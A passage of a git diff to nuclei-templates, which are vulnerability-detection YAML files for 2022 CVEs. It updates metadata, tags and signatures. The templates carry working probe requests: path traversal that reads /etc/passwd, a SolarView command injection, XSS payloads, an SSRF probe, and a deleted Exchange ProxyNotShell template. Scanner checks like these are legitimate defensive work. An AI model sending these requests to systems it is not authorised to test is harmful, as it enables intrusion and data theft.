https://wordpress.org/plugins/wp-upg/ - https://nvd.nist.gov/vuln/detail/CVE-2022-4060 + - https://github.com/im-hanzou/UPGer + - https://github.com/nomi-sec/PoC-in-GitHub classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-4060 cwe-id: CWE-94 - epss-score: 0.02055 - epss-percentile: 0.87761 + epss-score: 0.03753 + epss-percentile: 0.91618 cpe: cpe:2.3:a:odude:user_post_gallery:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +30,7 @@ info: vendor: odude product: user_post_gallery framework: wordpress - tags: unauth,wpscan,cve2022,rce,wordpress,wp-plugin,wp,cve,wp-upg + tags: cve,cve2022,unauth,wpscan,rce,wordpress,wp-plugin,wp,wp-upg,odude http: - method: GET @@ -53,4 +57,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205f190efdf043f1fc8c3eb2fc03343809938496c9eb8a0367ed997b3c9e643a2e0220325f4d14ab1f6089fd4aa2ec882ec731c77f67fb76f895f5d4e753ee1bed54a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200654ec12187c127abd7ddbeaaa97db5da699aae212f58f56dbdd9b3c3592da7d02205785dd9471edbb3f65c8fc27fb262bbb41ca3ef683dd42409e9fa2622df41348:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-4063.yaml b/nuclei-templates/CVE-2022/CVE-2022-4063.yaml index a087a1b3d4..892680e979 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-4063.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-4063.yaml @@ -6,18 +6,22 @@ info: severity: critical description: | WordPress InPost Gallery plugin before 2.1.4.1 is susceptible to local file inclusion. The plugin insecurely uses PHP's extract() function when rendering HTML views, which can allow attackers to force inclusion of malicious files and URLs. This, in turn, can enable them to execute code remotely on servers. + impact: | + The vulnerability allows an attacker to read arbitrary files on the server, potentially exposing sensitive information or executing malicious code. remediation: Fixed in version 2.1.4.1. reference: - https://wpscan.com/vulnerability/6bb07ec1-f1aa-4f4b-9717-c92f651a90a7 - https://wordpress.org/plugins/inpost-gallery/ - https://nvd.nist.gov/vuln/detail/CVE-2022-4063 + - https://github.com/cyllective/CVEs + - https://github.com/im-hanzou/INPGer classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-4063 cwe-id: CWE-22 - epss-score: 0.02354 - epss-percentile: 0.88623 + epss-score: 0.04425 + epss-percentile: 0.92213 cpe: cpe:2.3:a:pluginus:inpost_gallery:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +29,7 @@ info: vendor: pluginus product: inpost_gallery framework: wordpress - tags: cve,wp-plugin,wp,inpost-gallery,cve2022,lfi,wordpress,unauth,wpscan + tags: cve2022,cve,wp-plugin,wp,inpost-gallery,lfi,wordpress,unauth,wpscan,pluginus http: - method: GET @@ -47,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d17f66aa35a75f98c207d8b41e4ec79b96d5c58abdf1597bbf8559946df80f00022040a6e246df383c509a146275b4c5b8f2db62e91ef1256c74cf24ba6bc9ffaa15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022001c30dda208f23934117d6648b68a7cbc6063bd9487648f9d3cb3f954c8fb469022100eb1c85cee64fa01d404510e98f5b9c0975e3511b85a8e515435a7dce0084aef8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-40734.yaml b/nuclei-templates/CVE-2022/CVE-2022-40734.yaml index 4f3eabdbb6..12eece546a 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-40734.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-40734.yaml @@ -6,20 +6,32 @@ info: severity: medium description: | Laravel Filemanager (aka UniSharp) through version 2.5.1 is vulnerable to local file inclusion via download?working_dir=%2F. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, sensitive data exposure, and remote code execution. + remediation: | + Upgrade to a patched version of Laravel Filemanager v2.5.1 or apply the recommended security patches provided by the vendor. reference: - https://github.com/UniSharp/laravel-filemanager/issues/1150 - https://nvd.nist.gov/vuln/detail/CVE-2022-40734 + - https://github.com/UniSharp/laravel-filemanager/issues/1150#issuecomment-1320186966 + - https://github.com/UniSharp/laravel-filemanager/issues/1150#issuecomment-1825310417 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2022-40734 cwe-id: CWE-22 + epss-score: 0.01632 + epss-percentile: 0.86143 + cpe: cpe:2.3:a:unisharp:laravel_filemanager:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 2 + vendor: unisharp + product: laravel_filemanager shodan-query: http.html:"Laravel Filemanager" - verified: "true" tags: cve,cve2022,laravel,unisharp,lfi,traversal -requests: +http: - method: GET path: - "{{BaseURL}}/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd" @@ -30,5 +42,4 @@ requests: - type: regex regex: - "root:[x*]:0:0" - -# Enhanced by mp on 2023/01/15 +# digest: 4a0a00473045022100e98a87c4d16d7f1e1f4e3bd878e6b85448431976ad3ab893d2ce311bfbe051b002203da7fdd5c7a3b5bb0627aa18f2b5a7366a66ad2b2de1a34d774c059b20bd28d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-40843.yaml b/nuclei-templates/CVE-2022/CVE-2022-40843.yaml index dcf2f460a7..5cff18afee 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-40843.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-40843.yaml @@ -3,22 +3,31 @@ id: CVE-2022-40843 info: name: Tenda AC1200 V-W15Ev2 - Authentication Bypass author: gy741 - severity: critical + severity: medium description: | The Tenda AC1200 V-W15Ev2 router is affected by improper authorization/improper session management. The software does not perform or incorrectly perform an authorization check when a user attempts to access a resource or perform an action. This allows the router's login page to be bypassed. The improper validation of user sessions/authorization can lead to unauthenticated attackers having the ability to read the router's file, which contains the MD5 password of the Administrator's user account. This vulnerability exists within the local web and hosted remote management console. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized configuration changes, network compromise, and potential access to sensitive information. + remediation: | + Apply the latest firmware update provided by the vendor to fix the authentication bypass vulnerability. reference: - https://boschko.ca/tenda_ac1200_router - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40843 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L - cvss-score: 9.9 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N + cvss-score: 4.9 cve-id: CVE-2022-40843 cwe-id: CWE-287 + epss-score: 0.40937 + epss-percentile: 0.97197 + cpe: cpe:2.3:o:tenda:w15e_firmware:15.11.0.10\(1576\):*:*:*:*:*:*:* metadata: max-request: 1 - tags: cve,cve2022,tenda,auth-bypass,router,iot + vendor: tenda + product: w15e_firmware + tags: cve2022,cve,tenda,auth-bypass,router,iot -requests: +http: - raw: - | GET /goform/downloadSyslog/syslog.log HTTP/1.1 @@ -47,3 +56,4 @@ requests: - type: status status: - 200 +# digest: 4a0a00473045022100d2aad06ddab3ccd6e666e1cc53a8974249101d2a25b364fb4b96543189e71c450220673c9fddd115564cbbe4faa07d9de703be2cd6af8eede2a57e4408e9ba10d5af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-40879.yaml b/nuclei-templates/CVE-2022/CVE-2022-40879.yaml index 13bd42c2a8..0132443048 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-40879.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-40879.yaml @@ -2,24 +2,37 @@ id: CVE-2022-40879 info: name: kkFileView 4.1.0 - Cross-Site Scripting - author: arafatansari + author: arafatansari,co5mos severity: medium description: | kkFileView 4.1.0 contains multiple cross-site scripting vulnerabilities via the errorMsg parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to a patched version of kkFileView or apply the necessary security patches to mitigate the XSS vulnerability. reference: - https://github.com/kekingcn/kkFileView/issues/389 - https://nvd.nist.gov/vuln/detail/CVE-2022-40879 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/Henry4E36/POCS classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 - cve-id: CVE-2022-29349 + cve-id: CVE-2022-40879 cwe-id: CWE-79 + epss-score: 0.03708 + epss-percentile: 0.91567 + cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:* metadata: verified: true + max-request: 1 + vendor: keking + product: kkfileview shodan-query: http.html:"kkFileView" - tags: cve,cve2022,kkFileView,xss + tags: cve,cve2022,kkFileView,xss,keking -requests: +http: - method: GET path: - "{{BaseURL}}/onlinePreview?url=aHR0cHM6Ly93d3cuZ29vZ2xlLjxpbWcgc3JjPTEgb25lcnJvcj1hbGVydChkb2N1bWVudC5kb21haW4pPj1QUQ==" @@ -41,5 +54,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/12/13 +# digest: 490a00463044022002d0aafae336d011a0a74b01352143f57a21e65003ac86e0ea9563934522d3c80220494bc3ac1854a6da8d5cc61b7c8b2b0158429cb26e83ab3f628b90e2dfb751a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-40881.yaml b/nuclei-templates/CVE-2022/CVE-2022-40881.yaml index bafbfd6b54..929886f5a0 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-40881.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-40881.yaml @@ -6,6 +6,10 @@ info: severity: critical description: | SolarView Compact 6.00 is vulnerable to a command injection via network_test.php. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system. + remediation: | + Apply the latest patch or upgrade to a non-vulnerable version of SolarView. reference: - https://github.com/Timorlover/SolarView_Compact_6.0_rce_via_network_test.php - https://github.com/advisories/GHSA-wx3r-88rg-whxq @@ -15,15 +19,20 @@ info: cvss-score: 9.8 cve-id: CVE-2022-40881 cwe-id: CWE-77 + epss-score: 0.96169 + epss-percentile: 0.99389 + cpe: cpe:2.3:o:contec:solarview_compact_firmware:6.00:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: contec + product: solarview_compact_firmware shodan-query: http.favicon.hash:"-244067125" - verified: "true" - tags: cve,cve2022,solarview,rce,lfi - + tags: cve,cve2022,solarview,rce,lfi,contec variables: cmd: "cat${IFS}/etc/passwd" -requests: +http: - raw: - | POST /network_test.php HTTP/1.1 @@ -42,5 +51,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2023/01/15 +# digest: 4b0a00483046022100cf7cdba34d65b8edb10f08b9b4c8fe7f62ad2f48374d0ebc15d7f2bfbda8b361022100db8d88fc5035579a5be45602c1ebb9ac2daf06fa12f71eea28888fc63f5242b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-41040.yaml b/nuclei-templates/CVE-2022/CVE-2022-41040.yaml deleted file mode 100644 index de201d9b75..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-41040.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: CVE-2022-41040 - -info: - name: Microsoft Exchange Server Server-Side Request Forgery Vulnerability - author: Phillipo - severity: high - description: Microsoft Exchange Server Elevation of Privilege Vulnerability. - reference: - - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-41040 - - http://packetstormsecurity.com/files/170066/Microsoft-Exchange-ProxyNotShell-Remote-Code-Execution.html - - https://hackerone.com/reports/1719719 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cwe-id: CWE-918 - cve-id: CVE-2022-41040 - tags: cve,cve2022,kev,microsoft - -http: - - method: GET - path: - - "{{BaseURL}}/autodiscover/autodiscover.json/v1.0/aa@{{Host}}?Protocol=Autodiscoverv1" - - "{{BaseURL}}/autodiscover/autodiscover.json/v1.0/aa..{{Host}}/owa/?&Email=autodiscover/autodiscover.json?a..{{Host}}&Protocol=Autodiscoverv1&Protocol=Powershell" - - "{{BaseURL}}/autodiscover/autodiscover.json/v1.0/aa@{{Host}}/owa/?&Email=autodiscover/autodiscover.json?a@{{Host}}&Protocol=Autodiscoverv1&Protocol=Powershell" - - "{{BaseURL}}/autodiscover/autodiscover.json?aa..{{Host}}/owa/?&Email=autodiscover/autodiscover.json?a..{{Host}}&Protocol=Autodiscoverv1&{{Host}}Protocol=Powershell" - - "{{BaseURL}}/autodiscover/autodiscover.json?aa@{{Host}}/owa/?&Email=autodiscover/autodiscover.json?a@{{Host}}&Protocol=Autodiscoverv1&{{Host}}Protocol=Powershell" - - "{{BaseURL}}/autodiscover/autodiscover.json?aa..{{Host}}/owa/?&Email=aa@autodiscover/autodiscover.json?a..{{Host}}&Protocol=Autodiscoverv1&{{Host}}Protocol=Powershell" - - "{{BaseURL}}/autodiscover/autodiscover.json?aa@{{Host}}/owa/?&Email=aa@autodiscover/autodiscover.json?a@{{Host}}&Protocol=Autodiscoverv1&{{Host}}Protocol=Powershell" - - "{{BaseURL}}/autodiscover/autodiscover.json?aa..{{Host}}/owa/?&Email=aa@autodiscover/autodiscover.json?a..{{Host}}&Protocol=Autodiscoverv1&{{Host}}Protocol=Powershell" - - "{{BaseURL}}/autodiscover/autodiscover.json/v1.0/aa@autodiscover/autodiscover.json?a..@{{Host}}&Protocol=Autodiscoverv1&Protocol=Powershell" - - "{{BaseURL}}/autodiscover/autodiscover.json?@{{Host}}/&Email=autodiscover/autodiscover.json%3f@{{Host}}" - redirects: false - matchers: - - type: status - status: - - 404 - - type: word - part: body - words: - - 'IIS Web Core' - matchers-condition: and diff --git a/nuclei-templates/CVE-2022/CVE-2022-4117.yaml b/nuclei-templates/CVE-2022/CVE-2022-4117.yaml index d531e09ead..c6161c4c1e 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-4117.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-4117.yaml @@ -6,19 +6,23 @@ info: severity: critical description: | WordPress IWS Geo Form Fields plugin through 1.0 contains a SQL injection vulnerability. The plugin does not properly escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or further compromise of the affected WordPress site. remediation: | Update to the latest version of the WordPress IWS Geo Form Fields plugin (>=1.1) or apply the vendor-supplied patch to mitigate the SQL Injection vulnerability. reference: - https://wpscan.com/vulnerability/1fac3eb4-13c0-442d-b27c-7b7736208193 - https://wordpress.org/plugins/iws-geo-form-fields/ - https://nvd.nist.gov/vuln/detail/CVE-2022-4117 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/cyllective/CVEs classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-4117 cwe-id: CWE-89 - epss-score: 0.03393 - epss-percentile: 0.90397 + epss-score: 0.03413 + epss-percentile: 0.9123 cpe: cpe:2.3:a:iws-geo-form-fields_project:iws-geo-form-fields:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +30,7 @@ info: vendor: iws-geo-form-fields_project product: iws-geo-form-fields framework: wordpress - tags: cve,cve2022,sqli,wordpress,wp-plugin,wp,iws-geo-form-fields,wpscan + tags: cve,cve2022,sqli,wordpress,wp-plugin,wp,iws-geo-form-fields,wpscan,iws-geo-form-fields_project http: - raw: @@ -45,4 +49,4 @@ http: - 'status_code == 200' - 'contains(body, "\"status\":200") && contains(body, "{\"html\":")' condition: and -# digest: 4a0a00473045022034e43c08b36db76e80b59b5a37d45f087ad60b59bab7e3cf1dcb92b3d446ae060221008d9ef12284c8708cd19a3ffe6d77879f7673947d49f3a5caeb2de93d16b31df3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220527f8e6fc57bb3c042da2a2145f63f88cab3db7eeb282091c66cf526cd9b36e30220586c5e71de7bd30a22f81171809aba45884a19aea6b85a63181ef2de54f14d63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-4140.yaml b/nuclei-templates/CVE-2022/CVE-2022-4140.yaml index 48e6f7931f..52b44d19be 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-4140.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-4140.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress Welcart e-Commerce plugin before 2.8.5 is susceptible to arbitrary file access. The plugin does not validate user input before using it to output the content of a file, which can allow an attacker to read arbitrary files on the server, obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can access sensitive files on the server, potentially exposing sensitive information. remediation: Fixed in version 2.8.5. reference: - https://wpscan.com/vulnerability/0d649a7e-3334-48f7-abca-fff0856e12c7 @@ -16,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-4140 cwe-id: CWE-552 - epss-score: 0.00869 - epss-percentile: 0.8049 + epss-score: 0.00932 + epss-percentile: 0.82572 cpe: cpe:2.3:a:collne:welcart_e-commerce:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +27,7 @@ info: vendor: collne product: welcart_e-commerce framework: wordpress - tags: usc-e-shop,wpscan,cve,cve2022,wp-plugin,wp,wordpress,lfi,unauthenticated + tags: cve,cve2022,usc-e-shop,wpscan,wp-plugin,wp,wordpress,lfi,unauthenticated,collne http: - method: GET @@ -52,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204afe3e9ce34833a9cd4dbe8795cad09e501252d799b76235e1f5c62f72876c64022100f5ce18bdcd994721db26435ff7face9e500f73ea5e1d7df748ae54547aa3fd91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200691e9b2e104e67432ef4041648aca88eaa5a1fc58bbc764da8a0cf8240733da022015c0a0d07bcd6552d8c77f685c7c9bc595e3e7e9f3d8bf9b201968fcd4af75b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-41412.yaml b/nuclei-templates/CVE-2022/CVE-2022-41412.yaml index ca264a6247..5af2d670a0 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-41412.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-41412.yaml @@ -17,23 +17,21 @@ info: cvss-score: 8.6 cve-id: CVE-2022-41412 cwe-id: CWE-918 - epss-score: 0.0224 - epss-percentile: 0.89541 + epss-score: 0.0012 + epss-percentile: 0.45431 cpe: cpe:2.3:a:perfsonar:perfsonar:*:*:*:*:*:*:*:* metadata: - verified: true max-request: 1 vendor: perfsonar product: perfsonar - fofa-query: - - title="perfSONAR Toolkit" - - title="perfsonar toolkit" + fofa-query: title="perfSONAR Toolkit" + verified: true tags: cve,cve2022,ssrf,hackerone,packetstorm,perfsonar http: - method: GET path: - - "{{BaseURL}}/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://{{interactsh-url}}/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4" + - "{{BaseURL}}/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://oast.fun/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4" matchers-condition: and matchers: @@ -45,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022006a47d11706105ec5ff8bb32f84f5cc23566591377947e1d8f90888a3b028bf702203843cbf5b2bc7b991f92043424c560f048dacc0128451c47d25c1b40528b5034:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e598e38759b6d2c7b34ecb326730371101115feee22f2e9a4e8ecf3fdb09f45902204532d257a96dbe274009bfc99b23ace1c08d5824445578aed77faf1654dc813e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-41441.yaml b/nuclei-templates/CVE-2022/CVE-2022-41441.yaml index f552c574f9..9f6631c80e 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-41441.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-41441.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | ReQlogic v11.3 allow attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the POBatch and WaitDuration parameters. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in ReQlogic v11.3. reference: @@ -19,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-41441 cwe-id: CWE-79 - epss-score: 0.00091 - epss-percentile: 0.38742 + epss-score: 0.00155 + epss-percentile: 0.5093 cpe: cpe:2.3:a:reqlogic:reqlogic:11.3:*:*:*:*:*:*:* metadata: verified: true @@ -28,7 +30,7 @@ info: vendor: reqlogic product: reqlogic shodan-query: http.html:"ReQlogic" - tags: packetstorm,cve,cve2022,xss,reqlogic + tags: cve,cve2022,packetstorm,xss,reqlogic http: - method: GET @@ -45,4 +47,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body_2, "") && contains(body_2, "POProcessTimeout")' condition: and -# digest: 490a0046304402203ce32af4ce5737693b2f500c167f42c8ccc89282a10bd08cb357808fe86aecd602205a3b8a7f3235bbe35766ee870ac75344da0f29dd561d3111a44ad77210f92514:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009639948683a1cbabebf7e7ebb27e2e1f72a571fd097c09de93b67ea65d95f021022100f0953cb6c21404e57e03e89f6d3b1956c83911cb12cad4bef5b21c86d957ece6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-41473.yaml b/nuclei-templates/CVE-2022/CVE-2022-41473.yaml index 0f5b7a7393..487d6d487a 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-41473.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-41473.yaml @@ -6,20 +6,33 @@ info: severity: medium description: | RPCMS 3.0.2 contains a cross-site scripting vulnerability in the Search function. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the website. + remediation: | + Apply the latest security patch or upgrade to a newer version of RPCMS to mitigate the XSS vulnerability. reference: - https://github.com/ralap-z/rpcms/issues/1 - https://nvd.nist.gov/vuln/detail/CVE-2022-41473 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/Henry4E36/POCS + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-41473 cwe-id: CWE-79 + epss-score: 0.012 + epss-percentile: 0.84884 + cpe: cpe:2.3:a:rpcms:rpcms:3.0.2:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: 'rpcms' + product: 'rpcms' shodan-query: http.html:"RPCMS" - verified: "true" - tags: cve,cve2022,rpcms,xss + tags: cve,cve2022,rpcms,xss,'rpcms' -requests: +http: - method: GET path: - "{{BaseURL}}/search/?q=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" @@ -41,5 +54,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/10/18 +# digest: 490a00463044022059710e3756b18a7a2e6049fda0d5f4cfbbfbccea1f551f4070f781ae489fd40702201464c4ea707b48789fb3cefb06228c1cd8d5cf08174c84ef530dea45bd1cd0b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-41840.yaml b/nuclei-templates/CVE-2022/CVE-2022-41840.yaml index d608fd824e..1a11bfefce 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-41840.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-41840.yaml @@ -6,6 +6,10 @@ info: severity: critical description: | Welcart eCommerce 2.7.7 and before are vulnerable to unauthenticated local file inclusion. + impact: | + The LFI vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further exploitation. + remediation: | + Upgrade Welcart eCommerce plugin to the latest version (>=2.7.8) or apply the provided patch to fix the LFI vulnerability. reference: - https://patchstack.com/database/vulnerability/usc-e-shop/wordpress-welcart-e-commerce-plugin-2-7-7-unauth-directory-traversal-vulnerability - https://wordpress.org/plugins/usc-e-shop/ @@ -16,29 +20,35 @@ info: cvss-score: 9.8 cve-id: CVE-2022-41840 cwe-id: CWE-22 + epss-score: 0.00738 + epss-percentile: 0.78774 + cpe: cpe:2.3:a:collne:welcart_e-commerce:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: cve,cve2022,wp-plugin,wordpress,wp,lfi,unauth,usc-e-shop + verified: true + max-request: 1 + vendor: collne + product: welcart_e-commerce + framework: wordpress + tags: cve2022,cve,wp-plugin,wordpress,wp,lfi,unauth,usc-e-shop,collne -requests: +http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/progress-check.php?progressfile=../../../../../../../../../../../../../etc/passwd" matchers-condition: and matchers: - - type: regex - part: body - regex: - - "root:.*:0:0:" - - type: word part: header words: - "application/json" + - type: regex + part: body + regex: + - "root:.*:0:0:" + - type: status status: - 200 - -# Enhanced by mp on 2023/01/15 +# digest: 4a0a00473045022100f9dea7e19767e917eccb890bdc7a4b6effb2a1942275ba6bd15aa0362dc6b584022008f8c2bd3da536ba3f893eb70585ac286a8fb272343f3bb94fc865f1fceb68fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-42094.yaml b/nuclei-templates/CVE-2022/CVE-2022-42094.yaml index f4dabafadb..45ed564efd 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-42094.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-42094.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the 'Card' content. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of Backdrop CMS or apply the necessary security patches provided by the vendor. reference: @@ -13,20 +15,21 @@ info: - https://github.com/bypazs/CVE-2022-42094 - https://nvd.nist.gov/vuln/detail/CVE-2022-42094 - https://backdropcms.org + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N cvss-score: 4.8 cve-id: CVE-2022-42094 cwe-id: CWE-79 - epss-score: 0.00611 - epss-percentile: 0.76249 + epss-score: 0.0071 + epss-percentile: 0.80039 cpe: cpe:2.3:a:backdropcms:backdrop:1.23.0:*:*:*:*:*:*:* metadata: verified: true max-request: 4 vendor: backdropcms product: backdrop - tags: cve,cve2022,xss,cms,backdrop,authenticated,intrusive + tags: cve,cve2022,xss,cms,backdrop,authenticated,intrusive,backdropcms http: - raw: @@ -166,4 +169,4 @@ http: regex: - name="form_token" value="(.*)" internal: true -# digest: 4b0a00483046022100a9a3fd20f2d2db93f53a2e03ab8524c6e0f878ce8e699cc5cf8e102756756016022100dcabe44334536fd91358220c1265969410cc91ea8a1acafbfd823df166e789a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100833759ad52afd13abc5b49fcd770918213699021dbc4ed1ad7e66372e0f0548302201073403909a88ddab9ad7c88c79479b903f7d8b8dced717e7d8d0e89a6f05b3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-42095.yaml b/nuclei-templates/CVE-2022/CVE-2022-42095.yaml index f2a95b3880..0eabac7cfe 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-42095.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-42095.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Page content. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Upgrade to a patched version of Backdrop CMS or apply the necessary security patches provided by the vendor. reference: @@ -18,15 +20,15 @@ info: cvss-score: 4.8 cve-id: CVE-2022-42095 cwe-id: CWE-79 - epss-score: 0.00344 - epss-percentile: 0.68441 + epss-score: 0.00283 + epss-percentile: 0.65226 cpe: cpe:2.3:a:backdropcms:backdrop_cms:1.23.0:*:*:*:*:*:*:* metadata: verified: true max-request: 5 vendor: 